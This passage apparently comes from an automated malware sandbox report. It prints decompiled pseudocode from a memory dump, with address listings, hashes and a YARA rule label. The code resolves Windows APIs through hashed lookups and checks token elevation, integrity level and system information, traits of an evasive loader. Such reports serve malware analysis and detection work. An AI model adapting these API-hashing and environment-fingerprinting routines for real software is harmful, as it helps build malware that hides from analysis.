															if(_t410 == 0 || _t410 == 0xffffffff) {
																_t295 = 1;
															} else {
																_t295 = 0;
															}
															if(_t295 == 0) {
																E003CBF00(_t410);
															}
														}
														_v172 = 0;
														_t197 = 2;
													}
												}
											} else {
												E003B8CA0( &_v156);
												if(_v160 != 0) {
													_t411 = _v164;
													if(_t411 == 0 || _t411 == 0xffffffff) {
														_t298 = 1;
													} else {
														_t298 = 0;
													}
													if(_t298 == 0) {
														E003CBF00(_t411);
													}
												}
												_v164 = 0;
												_t197 = 1;
											}
										} else {
											_t197 = 1;
										}
										L64:
										_t383 =  *0x3db1f0; // 0x26859a0
										 *(_t445 + 0x1ac) = 0;
										 *(_t383 + 0x24) = _t197;
										_t384 =  *0x3db1f4; // 0x2661568
										if(_t384 == 0xc139578) {
											 *0x3db1f4 = 0;
											goto L70;
										} else {
											if(_t384 == 0) {
												L70:
												_push(0x3ab94787);
												_t432 = E003B7564(0x3ab94787);
												if(_t432 == 0) {
													if(E003B6C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t432 = E003B7564(0x3ab94787);
													}
												}
												if(_t432 == 0) {
													goto L87;
												} else {
													_t445 = _t445 + 0xfffffff8;
													_t402 = E003B67C8(_t432, 0xc17c5a6e);
													goto L73;
												}
											} else {
												do {
													_t368 = _t314;
													_t282 = _t368;
													while( *((intOrPtr*)(_t282 + _t384 + 8)) != 0xc17c5a6e) {
														_t368 = _t368 + 1;
														_t282 = _t282 + 0x18;
														if(_t368 < 0x10) {
															continue;
														} else {
															goto L69;
														}
														goto L88;
													}
													_t402 =  *((intOrPtr*)(_t282 + _t384 + 0x14));
													if(_t402 != 0) {
														L73:
														if(_t402 == 0) {
															L87:
															_t201 = _t314;
														} else {
															_push(_t445 + 0x1ac);
															_push(8);
															_push(0xffffffff);
															if( *_t402() == 0) {
																goto L87;
															} else {
																_t403 =  *0x3db1f4; // 0x2661568
																if(_t403 == 0xc139578) {
																	 *0x3db1f4 = 0;
																	goto L81;
																} else {
																	if(_t403 == 0) {
																		L81:
																		_push(0x3ab94787);
																		_t432 = E003B7564(0x3ab94787);
																		if(_t432 == 0) {
																			if(E003B6C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t432 = E003B7564(0x3ab94787);
																			}
																		}
																		if(_t432 == 0) {
																			goto L87;
																		} else {
																			_t445 = _t445 + 0xfffffff8;
																			_t366 = E003B67C8(_t432, 0x2eeff4c6);
																			goto L84;
																		}
																	} else {
																		do {
																			_t367 = _t314;
																			_t279 = _t367;
																			while( *((intOrPtr*)(_t279 + _t403 + 8)) != 0x2eeff4c6) {
																				_t367 = _t367 + 1;
																				_t279 = _t279 + 0x18;
																				if(_t367 < 0x10) {
																					continue;
																				} else {
																					goto L80;
																				}
																				goto L88;
																			}
																			_t366 =  *((intOrPtr*)(_t279 + _t403 + 0x14));
																			if(_t366 != 0) {
																				L84:
																				if(_t366 == 0) {
																					goto L87;
																				} else {
																					_t275 = GetTokenInformation(_v88, 0x14,  &_v100, 4,  &_v104); // executed
																					if(_t275 == 0) {
																						goto L87;
																					} else {
																						_t201 = _t314 & 0xffffff00 | _v104 > 0x00000000;
																					}
																				}
																			} else {
																				goto L81;
																			}
																			goto L88;
																			L80:
																			asm("o16 nop [eax+eax]");
																			_t66 = _t403 + 0x180; // 0x26890a8
																			_t403 =  *_t66;
																		} while (_t403 != 0);
																		goto L81;
																	}
																}
															}
														}
													} else {
														goto L70;
													}
													goto L88;
													L69:
													asm("o16 nop [eax+eax]");
													_t62 = _t384 + 0x180; // 0x26890a8
													_t384 =  *_t62;
												} while (_t384 != 0);
												goto L70;
											}
										}
										L88:
										_t344 =  *0x3db1f0; // 0x26859a0
										 *(_t344 + 0x29) = _t201;
										 *((intOrPtr*)(_t344 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
										if( *_t344 >= 0x10) {
											_t386 =  *0x3db1f4; // 0x2661568
											 *(_t445 + 0x1a4) = 0;
											if(_t386 == 0xc139578) {
												 *0x3db1f4 = 0;
												goto L100;
											} else {
												if(_t386 == 0) {
													L100:
													_push(0x3ab94787);
													_t432 = E003B7564(0x3ab94787);
													if(_t432 == 0) {
														if(E003B6C50(0x3ab94787) != 0) {
															_push(0x3ab94787);
															_t432 = E003B7564(0x3ab94787);
														}
													}
													if(_t432 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t386 = E003B67C8(_t432, 0xc17c5a6e);
														goto L103;
													}
												} else {
													do {
														_t364 = _t314;
														_t263 = _t364;
														while( *((intOrPtr*)(_t263 + _t386 + 8)) != 0xc17c5a6e) {
															_t364 = _t364 + 1;
															_t263 = _t263 + 0x18;
															if(_t364 < 0x10) {
																continue;
															} else {
																goto L99;
															}
															goto L105;
														}
														_t386 =  *(_t263 + _t386 + 0x14);
														if(_t386 != 0) {
															L103:
															if(_t386 != 0) {
																 *_t386(0xffffffff, 8,  &_v76);
															}
														} else {
															goto L100;
														}
														goto L105;
														L99:
														asm("o16 nop [eax+eax]");
														_t84 = _t386 + 0x180; // 0x26890a8
														_t386 =  *_t84;
													} while (_t386 != 0);
													goto L100;
												}
											}
											L105:
											_t346 =  &_v84;
											 *_t346 =  *(_t445 + 0x1a4);
											_t346[1] = 1;
											if(E003CBEA0(_t346, _t386, _t432) == 0) {
												_t387 =  *0x3db1f4; // 0x2661568
												_v88 = 0;
												if(_t387 == 0xc139578) {
													 *0x3db1f4 = 0;
													goto L114;
												} else {
													if(_t387 == 0) {
														L114:
														_push(0x3ab94787);
														_t432 = E003B7564(0x3ab94787);
														if(_t432 == 0) {
															if(E003B6C50(0x3ab94787) != 0) {
																_push(0x3ab94787);
																_t432 = E003B7564(0x3ab94787);
															}
														}
														if(_t432 != 0) {
															_t445 = _t445 + 0xfffffff8;
															_t398 = E003B67C8(_t432, 0x2eeff4c6);
															goto L117;
														}
													} else {
														do {
															_t362 = _t314;
															_t255 = _t362;
															while( *((intOrPtr*)(_t255 + _t387 + 8)) != 0x2eeff4c6) {
																_t362 = _t362 + 1;
																_t255 = _t255 + 0x18;
																if(_t362 < 0x10) {
																	continue;
																} else {
																	goto L113;
																}
																goto L119;
															}
															_t398 =  *((intOrPtr*)(_t255 + _t387 + 0x14));
															if(_t398 != 0) {
																L117:
																if(_t398 != 0) {
																	GetTokenInformation(_v96, 0x19, _t314, _t314,  &_v100); // executed
																}
															} else {
																goto L114;
															}
															goto L119;
															L113:
															asm("o16 nop [eax+eax]");
															_t94 = _t387 + 0x180; // 0x26890a8
															_t387 =  *_t94;
														} while (_t387 != 0);
														goto L114;
													}
												}
												L119:
												_t212 = _v92;
												if(_t212 != 0) {
													_push(_t212);
													E003C9350(_t445 + 8);
													_t433 = E003C9640(_t445 + 8, 0);
													_t388 =  *0x3db1f4; // 0x2661568
													if(_t388 == 0xc139578) {
														 *0x3db1f4 = 0;
														goto L160;
													} else {
														if(_t388 == 0) {
															L160:
															_push(0x3ab94787);
															_t420 = E003B7564(0x3ab94787);
															if(_t420 == 0) {
																if(E003B6C50(0x3ab94787) != 0) {
																	_push(0x3ab94787);
																	_t420 = E003B7564(0x3ab94787);
																}
															}
															if(_t420 == 0) {
																goto L178;
															} else {
																_t445 = _t445 + 0xfffffff8;
																_t394 = E003B67C8(_t420, 0x2eeff4c6);
																goto L163;
															}
														} else {
															do {
																_t360 = _t314;
																_t247 = _t360;
																while( *((intOrPtr*)(_t247 + _t388 + 8)) != 0x2eeff4c6) {
																	_t360 = _t360 + 1;
																	_t247 = _t247 + 0x18;
																	if(_t360 < 0x10) {
																		continue;
																	} else {
																		goto L159;
																	}
																	goto L236;
																}
																_t394 =  *((intOrPtr*)(_t247 + _t388 + 0x14));
																if(_t394 != 0) {
																	L163:
																	if(_t394 == 0) {
																		L178:
																		E003C9510( &_v496);
																		if(_v92 != 0) {
																			E003CBE30( &_v96, _t433);
																		}
																		goto L122;
																	} else {
																		_t234 = GetTokenInformation(_v104, 0x19, _t433, _v108,  &_v108); // executed
																		if(_t234 == 0) {
																			goto L178;
																		} else {
																			_t395 =  *0x3db1f4; // 0x2661568
																			if(_t395 == 0xc139578) {
																				 *0x3db1f4 = 0;
																				goto L171;
																			} else {
																				if(_t395 == 0) {
																					L171:
																					_push(0x3ab94787);
																					 *_t445 = E003B7564(0x3ab94787);
																					if( *_t445 == 0) {
																						if(E003B6C50(0x3ab94787) != 0) {
																							_push(0x3ab94787);
																							_v520 = E003B7564(0x3ab94787);
																						}
																					}
																					if( *_t445 == 0) {
																						goto L176;
																					} else {
																						_t445 = _t445 + 0xfffffff8;
																						_t241 = E003B67C8( *((intOrPtr*)(_t445 + 8)), 0x4e2f8db7);
																						goto L174;
																					}
																				} else {
																					do {
																						_t359 = _t314;
																						_t244 = _t359;
																						while( *((intOrPtr*)(_t244 + _t395 + 8)) != 0x4e2f8db7) {
																							_t359 = _t359 + 1;
																							_t244 = _t244 + 0x18;
																							if(_t359 < 0x10) {
																								continue;
																							} else {
																								goto L170;
																							}
																							goto L236;
																						}
																						_t241 =  *((intOrPtr*)(_t244 + _t395 + 0x14));
																						if(_t241 != 0) {
																							L174:
																							if(_t241 == 0) {
																								L176:
																								E003C9510(_t445 + 4);
																								if(_v108 != 0) {
																									E003CBE30( &_v112, _t433);
																								}
																								goto L122;
																							} else {
																								_push( *_t433);
																								asm("int3");
																								return _t241;
																							}
																						} else {
																							goto L171;
																						}
																						goto L236;
																						L170:
																						asm("o16 nop [eax+eax]");
																						_t133 = _t395 + 0x180; // 0x26890a8
																						_t395 =  *_t133;
																					} while (_t395 != 0);
																					goto L171;
																				}
																			}
																		}
																	}
																} else {
																	goto L160;
																}
																goto L236;
																L159:
																asm("o16 nop [eax+eax]");
																_t127 = _t388 + 0x180; // 0x26890a8
																_t388 =  *_t127;
															} while (_t388 != 0);
															goto L160;
														}
													}
												} else {
													if(_v84 != 0) {
														E003CBE30( &_v88, _t432);
													}
													goto L122;
												}
											} else {
												if( *((char*)(_t445 + 0x198)) != 0) {
													E003CBE30( &_v84, _t432);
												}
												L122:
												_t434 = _t314;
												_t219 =  *0x3db1f0; // 0x26859a0
												 *(_t219 + 0x2c) = _t434;
												goto L124;
											}
										} else {
											_t264 = E003B5100(_t419, _t432, _t439);
											_t400 =  *0x3db1f0; // 0x26859a0
											if(_t264 == 0) {
												if( *((char*)(_t400 + 0x28)) == 0) {
													 *(_t400 + 0x2c) = 3;
												} else {
													 *(_t400 + 0x2c) = 5;
												}
											} else {
												 *(_t400 + 0x2c) = 6;
											}
											L124:
											_t389 =  *0x3db1f4; // 0x2661568
											if(_t389 == 0xc139578) {
												 *0x3db1f4 = 0;
												goto L130;
											} else {
												if(_t389 == 0) {
													L130:
													_push(0xa1310f65);
													_t316 = E003B7564(0xa1310f65);
													if(_t316 == 0) {
														if(E003B6C50(0xa1310f65) != 0) {
															_push(0xa1310f65);
															_t316 = E003B7564(0xa1310f65);
														}
													}
													if(_t316 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t392 = E003B67C8(_t316, 0x4e85f18d);
														goto L133;
													}
												} else {
													do {
														_t354 = _t314;
														_t229 = _t354;
														while( *((intOrPtr*)(_t229 + _t389 + 8)) != 0x4e85f18d) {
															_t354 = _t354 + 1;
															_t229 = _t229 + 0x18;
															if(_t354 < 0x10) {
																continue;
															} else {
																goto L129;
															}
															goto L135;
														}
														_t392 =  *((intOrPtr*)(_t229 + _t389 + 0x14));
														if(_t392 != 0) {
															L133:
															if(_t392 != 0) {
																GetSystemInfo( &_v156);
															}
														} else {
															goto L130;
														}
														goto L135;
														L129:
														asm("o16 nop [eax+eax]");
														_t103 = _t389 + 0x180; // 0x26890a8
														_t389 =  *_t103;
													} while (_t389 != 0);
													goto L130;
												}
											}
											L135:
											_t223 =  *0x3db1f0; // 0x26859a0
											 *((short*)(_t223 + 0xe)) = _v156.dwAllocationGranularity;
											 *((intOrPtr*)(_t223 + 0x10)) = _v156.lpMaximumApplicationAddress;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t445 + 0x16c));
											 *((intOrPtr*)(_t223 + 0x18)) = _v156.dwNumberOfProcessors;
											 *((intOrPtr*)(_t223 + 0x1c)) = _v120;
											return _t223;
										}
									} else {
										_push(_t416);
										asm("int3");
										return _t308;
									}
								} else {
									break;
								}
								goto L236;
								L10:
								asm("o16 nop [eax+eax]");
								_t6 = _t377 + 0x180; // 0x26890a8
								_t377 =  *_t6;
							} while (_t377 != 0);
							L11:
							_push(0xa1310f65);
							_t425 = E003B7564(0xa1310f65);
							if(_t425 == 0) {
								if(E003B6C50(0xa1310f65) != 0) {
									_push(0xa1310f65);
									_t425 = E003B7564(0xa1310f65);
								}
							}
							if(_t425 == 0) {
								goto L16;
							} else {
								_t445 = _t445 + 0xfffffff8;
								_t308 = E003B67C8(_t425, 0x13e99f60);
								goto L14;
							}
						}
					}
				} else {
					return _t163;
				}
				L236:
			}

0x003b3931
0x003b3936
0x003b3937
0x003b3938
0x003b3939
0x003b393f
0x003b3941
0x003b394b
0x003b478e
0x003b4790
0x003b4795
0x003b4798
0x003b4798
0x003b3955
0x003b396a
0x003b3976
0x003b397b
0x003b397e
0x003b3984
0x003b3992
0x003b477d
0x003b4787
0x00000000
0x003b3998
0x003b399a
0x003b47a2
0x00000000
0x003b39a0
0x003b39a0
0x003b39a2
0x003b39a2
0x003b39a4
0x003b39a6
0x003b39b4
0x003b39b5
0x003b39bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b39bb
0x003b476c
0x003b4772
0x003b39f5
0x003b39f7
0x003b39fc
0x003b39fc
0x003b3a06
0x003b3a0a
0x003b3a0e
0x003b3a14
0x003b3a17
0x003b3a2d
0x003b3a32
0x003b3a3a
0x003b3a41
0x003b3a44
0x003b3a4a
0x003b3a51
0x003b3a59
0x003b4739
0x00000000
0x003b3a5f
0x003b3a61
0x003b3a8e
0x003b3a93
0x003b3a99
0x003b3a9d
0x003b4710
0x003b471b
0x003b4721
0x003b4721
0x003b4710
0x003b3aa5
0x003b3aae
0x003b3ab6
0x00000000
0x003b3ab6
0x003b3a63
0x003b3a63
0x003b3a63
0x003b3a65
0x003b3a67
0x003b3a75
0x003b3a76
0x003b3a7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b3a7c
0x003b4728
0x003b472e
0x003b3ab8
0x003b3aba
0x003b3ac6
0x003b3ac6
0x00000000
0x003b4734
0x00000000
0x003b4734
0x00000000
0x003b3a7e
0x003b3a7e
0x003b3a84
0x003b3a84
0x003b3a8a
0x00000000
0x003b3a63
0x003b3a61
0x003b3ac8
0x003b3ac8
0x003b3ad5
0x003b3add
0x003b3ad7
0x003b3ad7
0x003b3ad7
0x003b3ae1
0x003b3ae6
0x003b3aee
0x003b3af9
0x003b3b05
0x003b3b0c
0x003b3b14
0x003b3b1c
0x003b3b25
0x003b3b2e
0x003b3b30
0x003b3b35
0x003b3b37
0x003b3b44
0x003b3b4b
0x003b3b5d
0x003b3b62
0x003b3b63
0x003b3b65
0x003b3b6a
0x003b3b72
0x003b3b7b
0x003b3b82
0x003b3b9b
0x003b3ba0
0x003b3bae
0x003b3bb3
0x003b3bb7
0x003b3bbe
0x003b3c22
0x003b3c27
0x003b3c3a
0x003b3c3e
0x003b3c57
0x003b3c5c
0x003b3c6f
0x003b3c78
0x003b3c7f
0x003b3cd3
0x003b465c
0x003b466f
0x003b467c
0x003b467e
0x003b4687
0x003b4692
0x003b468e
0x003b468e
0x003b468e
0x003b4699
0x003b469c
0x003b469c
0x003b4699
0x003b46a1
0x003b46ac
0x00000000
0x003b465e
0x003b4661
0x003b46bd
0x003b46ca
0x003b46cc
0x003b46d5
0x003b46e0
0x003b46dc
0x003b46dc
0x003b46dc
0x003b46e7
0x003b46ea
0x003b46ea
0x003b46e7
0x003b46ef
0x003b46fa
0x00000000
0x003b4663
0x00000000
0x003b4663
0x003b4661
0x00000000
0x003b3cd9
0x003b3cdc
0x00000000
0x003b4108
0x003b410f
0x003b411c
0x003b411e
0x003b4127
0x003b4132
0x003b412e
0x003b412e
0x003b412e
0x003b4139
0x003b413c
0x003b413c
0x003b4139
0x003b4141
0x003b414c
0x003b414c
0x003b3cdc
0x003b3c81
0x003b3c83
0x003b3ce7
0x003b3cee
0x003b3cfb
0x003b3cfd
0x003b3d06
0x003b3d11
0x003b3d0d
0x003b3d0d
0x003b3d0d
0x003b3d18
0x003b3d1b
0x003b3d1b
0x003b3d18
0x003b3d20
0x003b3d2b
0x003b3c85
0x003b3c8c
0x003b3c99
0x003b3c9b
0x003b3ca4
0x003b3caf
0x003b3cab
0x003b3cab
0x003b3cab
0x003b3cb6
0x003b3cb9
0x003b3cb9
0x003b3cb6
0x003b3cbe
0x003b3cc9
0x003b3cc9
0x003b3c83
0x003b3bc0
0x003b3bc7
0x003b3bd4
0x003b3bd6
0x003b3bdf
0x003b3bea
0x003b3be6
0x003b3be6
0x003b3be6
0x003b3bf1
0x003b3bf4
0x003b3bf4
0x003b3bf1
0x003b3bf9
0x003b3c04
0x003b3c04
0x003b3afb
0x003b3afb
0x003b3afb
0x003b3d2d
0x003b3d2d
0x003b3d33
0x003b3d3e
0x003b3d41
0x003b3d4d
0x003b464b
0x00000000
0x003b3d53
0x003b3d55
0x003b3d82
0x003b3d87
0x003b3d8d
0x003b3d91
0x003b4622
0x003b462d
0x003b4633
0x003b4633
0x003b4622
0x003b3d99
0x00000000
0x003b3d9f
0x003b3da6
0x003b3dae
0x00000000
0x003b3dae
0x003b3d57
0x003b3d57
0x003b3d57
0x003b3d59
0x003b3d5b
0x003b3d69
0x003b3d6a
0x003b3d70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b3d70
0x003b463a
0x003b4640
0x003b3db0
0x003b3db2
0x003b3e6d
0x003b3e6d
0x003b3db8
0x003b3dbf
0x003b3dc0
0x003b3dc2
0x003b3dc8
0x00000000
0x003b3dce
0x003b3dce
0x003b3dda
0x003b418b
0x00000000
0x003b3de0
0x003b3de2
0x003b3e0f
0x003b3e14
0x003b3e1a
0x003b3e1e
0x003b4162
0x003b416d
0x003b4173
0x003b4173
0x003b4162
0x003b3e26
0x00000000
0x003b3e28
0x003b3e2f
0x003b3e37
0x00000000
0x003b3e37
0x003b3de4
0x003b3de4
0x003b3de4
0x003b3de6
0x003b3de8
0x003b3df6
0x003b3df7
0x003b3dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b3dfd
0x003b417a
0x003b4180
0x003b3e39
0x003b3e3b
0x00000000
0x003b3e3d
0x003b3e58
0x003b3e5c
0x00000000
0x003b3e5e
0x003b3e68
0x003b3e68
0x003b3e5c
0x003b4186
0x00000000
0x003b4186
0x00000000
0x003b3dff
0x003b3dff
0x003b3e05
0x003b3e05
0x003b3e0b
0x00000000
0x003b3de4
0x003b3de2
0x003b3dda
0x003b3dc8
0x003b4646
0x00000000
0x003b4646
0x00000000
0x003b3d72
0x003b3d72
0x003b3d78
0x003b3d78
0x003b3d7e
0x00000000
0x003b3d57
0x003b3d55
0x003b3e6f
0x003b3e6f
0x003b3e75
0x003b3e8a
0x003b3e8d
0x003b3ec8
0x003b3ece
0x003b3edf
0x003b4607
0x00000000
0x003b3ee5
0x003b3ee7
0x003b3f14
0x003b3f19
0x003b3f1f
0x003b3f23
0x003b45de
0x003b45e9
0x003b45ef
0x003b45ef
0x003b45de
0x003b3f2b
0x003b3f34
0x003b3f3c
0x00000000
0x003b3f3c
0x003b3ee9
0x003b3ee9
0x003b3ee9
0x003b3eeb
0x003b3eed
0x003b3efb
0x003b3efc
0x003b3f02
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b3f02
0x003b45f6
0x003b45fc
0x003b3f3e
0x003b3f40
0x003b3f4e
0x003b3f4e
0x003b4602
0x00000000
0x003b4602
0x00000000
0x003b3f04
0x003b3f04
0x003b3f0a
0x003b3f0a
0x003b3f10
0x00000000
0x003b3ee9
0x003b3ee7
0x003b3f50
0x003b3f57
0x003b3f5e
0x003b3f60
0x003b3f6b
0x003b3f8c
0x003b3f92
0x003b3fa3
0x003b45c3
0x00000000
0x003b3fa9
0x003b3fab
0x003b3fd8
0x003b3fdd
0x003b3fe3
0x003b3fe7
0x003b459a
0x003b45a5
0x003b45ab
0x003b45ab
0x003b459a
0x003b3fef
0x003b3ff8
0x003b4000
0x00000000
0x003b4000
0x003b3fad
0x003b3fad
0x003b3fad
0x003b3faf
0x003b3fb1
0x003b3fbf
0x003b3fc0
0x003b3fc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b3fc6
0x003b45b2
0x003b45b8
0x003b4002
0x003b4004
0x003b4019
0x003b4019
0x003b45be
0x00000000
0x003b45be
0x00000000
0x003b3fc8
0x003b3fc8
0x003b3fce
0x003b3fce
0x003b3fd4
0x00000000
0x003b3fad
0x003b3fab
0x003b401b
0x003b401b
0x003b4024
0x003b41de
0x003b41e3
0x003b41f3
0x003b41f5
0x003b4201
0x003b457f
0x00000000
0x003b4207
0x003b4209
0x003b4236
0x003b423b
0x003b4241
0x003b4245
0x003b4556
0x003b4561
0x003b4567
0x003b4567
0x003b4556
0x003b424d
0x00000000
0x003b4253
0x003b425a
0x003b4262
0x00000000
0x003b4262
0x003b420b
0x003b420b
0x003b420b
0x003b420d
0x003b420f
0x003b421d
0x003b421e
0x003b4224
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4224
0x003b456e
0x003b4574
0x003b4264
0x003b4266
0x003b4470
0x003b4474
0x003b4481
0x003b448e
0x003b448e
0x00000000
0x003b426c
0x003b4285
0x003b4289
0x00000000
0x003b428f
0x003b428f
0x003b429b
0x003b453b
0x00000000
0x003b42a1
0x003b42a3
0x003b42d0
0x003b42d5
0x003b42db
0x003b42e2
0x003b4511
0x003b451c
0x003b4522
0x003b4522
0x003b4511
0x003b42ec
0x00000000
0x003b42f2
0x003b42f2
0x003b42fe
0x00000000
0x003b42fe
0x003b42a5
0x003b42a5
0x003b42a5
0x003b42a7
0x003b42a9
0x003b42b7
0x003b42b8
0x003b42be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b42be
0x003b452a
0x003b4530
0x003b4303
0x003b4305
0x003b4448
0x003b444c
0x003b4459
0x003b4466
0x003b4466
0x00000000
0x003b430b
0x003b430b
0x003b430d
0x003b430e
0x003b430e
0x003b4536
0x00000000
0x003b4536
0x00000000
0x003b42c0
0x003b42c0
0x003b42c6
0x003b42c6
0x003b42cc
0x00000000
0x003b42a5
0x003b42a3
0x003b429b
0x003b4289
0x003b457a
0x00000000
0x003b457a
0x00000000
0x003b4226
0x003b4226
0x003b422c
0x003b422c
0x003b4232
0x00000000
0x003b420b
0x003b4209
0x003b402a
0x003b4032
0x003b403b
0x003b403b
0x00000000
0x003b4032
0x003b3f6d
0x003b3f75
0x003b3f82
0x003b3f82
0x003b4040
0x003b4040
0x003b4042
0x003b4047
0x00000000
0x003b4047
0x003b3e8f
0x003b3e8f
0x003b3e94
0x003b3e9c
0x003b3eae
0x003b3ebc
0x003b3eb0
0x003b3eb0
0x003b3eb0
0x003b3e9e
0x003b3e9e
0x003b3e9e
0x003b404a
0x003b404a
0x003b4056
0x003b41cf
0x00000000
0x003b405c
0x003b405e
0x003b408b
0x003b4090
0x003b4096
0x003b409a
0x003b41a6
0x003b41b1
0x003b41b7
0x003b41b7
0x003b41a6
0x003b40a2
0x003b40ab
0x003b40b3
0x00000000
0x003b40b3
0x003b4060
0x003b4060
0x003b4060
0x003b4062
0x003b4064
0x003b4072
0x003b4073
0x003b4079
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4079
0x003b41be
0x003b41c4
0x003b40b5
0x003b40b7
0x003b40c1
0x003b40c1
0x003b41ca
0x00000000
0x003b41ca
0x00000000
0x003b407b
0x003b407b
0x003b4081
0x003b4081
0x003b4087
0x00000000
0x003b4060
0x003b405e
0x003b40c3
0x003b40c3
0x003b40eb
0x003b40ef
0x003b40f2
0x003b40f5
0x003b40f8
0x003b4107
0x003b4107
0x003b39f9
0x003b39f9
0x003b39fa
0x003b39fb
0x003b39fb
0x003b4778
0x00000000
0x003b4778
0x00000000
0x003b39bd
0x003b39bd
0x003b39c3
0x003b39c3
0x003b39c9
0x003b39cd
0x003b39d2
0x003b39d8
0x003b39dc
0x003b4754
0x003b475f
0x003b4765
0x003b4765
0x003b4754
0x003b39e4
0x00000000
0x003b39e6
0x003b39ed
0x003b39f0
0x00000000
0x003b39f0
0x003b39e4
0x003b399a
0x003b395d
0x003b3969
0x003b3969
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f9a5bbbff0b79ab9cdbe3be9a33644d67c3c511b2d788e6e662b4544b4d455
Instruction ID: 7aae152439741b484cc94630952a1073f21e1e5aa831c58bb4d329cc37098507
Opcode Fuzzy Hash: 91f9a5bbbff0b79ab9cdbe3be9a33644d67c3c511b2d788e6e662b4544b4d455
Instruction Fuzzy Hash: BA521830B042518BD737DB28D895BEAB799AF8130CF1A862DE6458FA93DB30DD45C781

Uniqueness

Uniqueness Score: -1.00%

Function 003B6C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E003B6C50(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t135;
				intOrPtr _t138;
				void* _t143;
				void* _t147;
				void* _t151;
				struct _OBJDIR_INFORMATION _t164;
				void* _t170;
				intOrPtr _t183;
				struct _OBJDIR_INFORMATION _t197;
				struct _OBJDIR_INFORMATION _t206;
				long _t212;
				void* _t215;
				intOrPtr _t246;
				signed int _t278;
				signed int _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t291;
				void* _t340;
				struct _OBJDIR_INFORMATION _t342;
				intOrPtr _t345;
				struct _OBJDIR_INFORMATION _t363;
				intOrPtr _t366;
				struct _OBJDIR_INFORMATION _t382;
				struct _OBJDIR_INFORMATION _t389;
				struct _OBJDIR_INFORMATION _t390;
				struct _OBJDIR_INFORMATION _t391;
				intOrPtr* _t394;
				void* _t395;
				intOrPtr* _t397;
				void* _t398;
				void* _t399;
				void* _t401;
				void* _t402;
				void* _t404;
				void* _t405;
				void* _t406;
				short* _t407;
				void* _t408;
				void* _t410;
				void* _t411;
				intOrPtr _t412;
				intOrPtr* _t413;
				short* _t418;
				void* _t420;
				void* _t421;
				intOrPtr* _t422;
				void* _t424;
				void* _t425;
				struct _OBJDIR_INFORMATION* _t426;

				_t278 = __ecx;
				E003B8810(_t426 + 0x2c8, 0);
				E003B8810(_t426 + 0x2d0, 0);
				_t135 = E003B3930(__ecx, 0, _t399, _t406);
				_t412 =  *0x3db208; // 0x2685a38
				if( *((char*)(_t135 + 0xb)) == 0x40) {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t413 = E003B1030();
						_t426 = _t426 + 4;
						if(_t413 == 0) {
							_t413 = 0;
						} else {
							_t122 = _t413 + 8; // 0x8
							 *_t413 = 0;
							 *((intOrPtr*)(_t413 + 4)) = 0;
							E003B8810(_t122, 0);
							_t124 = _t413 + 0x10; // 0x10
							E003B8810(_t124, 0);
							_t125 = _t413 + 0x18; // 0x18
							E003B8810(_t125, 0);
							_t126 = _t413 + 0x20; // 0x20
							E003B8810(_t126, 0);
							_t127 = _t413 + 0x28; // 0x28
							E003B8810(_t127, 0);
							_t128 = _t413 + 0x30; // 0x30
							E003B8810(_t128, 0);
							_t129 = _t413 + 0x38; // 0x38
							E003B8810(_t129, 0);
							_t130 = _t413 + 0x40; // 0x40
							E003B8810(_t130, 0);
							_t131 = _t413 + 0x48; // 0x48
							E003B8810(_t131, 0);
							_t410 = 6;
							_t132 = _t413 + 0x50; // 0x50
							_t404 = _t132;
							do {
								E003B8810(_t404, 0);
								_t404 = _t404 + 8;
								_t410 = _t410 - 1;
							} while (_t410 != 0);
						}
						 *0x3db208 = _t413;
					}
					if(E003B9DC0(_t413 + 0x38) != 0) {
						E003B8810(_t426 + 0x26c, 0x80);
						_t342 =  *0x3db1f4; // 0x2661568
						if(_t342 == 0xc139578) {
							 *0x3db1f4 = 0;
							goto L86;
						} else {
							if(_t342 == 0) {
								L86:
								_push(0xa1310f65);
								_t420 = E003B7564(0xa1310f65);
								if(_t420 == 0) {
									if(E003B6C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t420 = E003B7564(0xa1310f65);
									}
								}
								if(_t420 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t394 = E003B67C8(_t420, 0x7c2e142f);
									goto L89;
								}
							} else {
								do {
									_t421 = 0;
									_t395 = 0;
									while( *((intOrPtr*)(_t395 + _t342 + 8)) != 0x7c2e142f) {
										_t421 = _t421 + 1;
										_t395 = _t395 + 0x18;
										if(_t421 < 0x10) {
											continue;
										} else {
											goto L85;
										}
										goto L91;
									}
									_t394 =  *((intOrPtr*)(_t395 + _t342 + 0x14));
									if(_t394 != 0) {
										L89:
										if(_t394 != 0) {
											 *_t394( *(_t426 + 0x26c),  *(_t426 + 0x26c) >> 1);
										}
									} else {
										goto L86;
									}
									goto L91;
									L85:
									asm("o16 nop [eax+eax]");
									_t109 = _t342 + 0x180; // 0x26890a8
									_t342 =  *_t109;
								} while (_t342 != 0);
								goto L86;
							}
						}
						L91:
						if(( *(E003B9DE0(_t426 + 0x268)) & 0x0000ffff) != 0x5c) {
							E003B96D0(_t426 + 0x26c, 0x5c);
						}
						_t345 =  *0x3db208; // 0x2685a38
						E003B8CC0(_t345 + 0x38,  *((intOrPtr*)(_t426 + 0x268)));
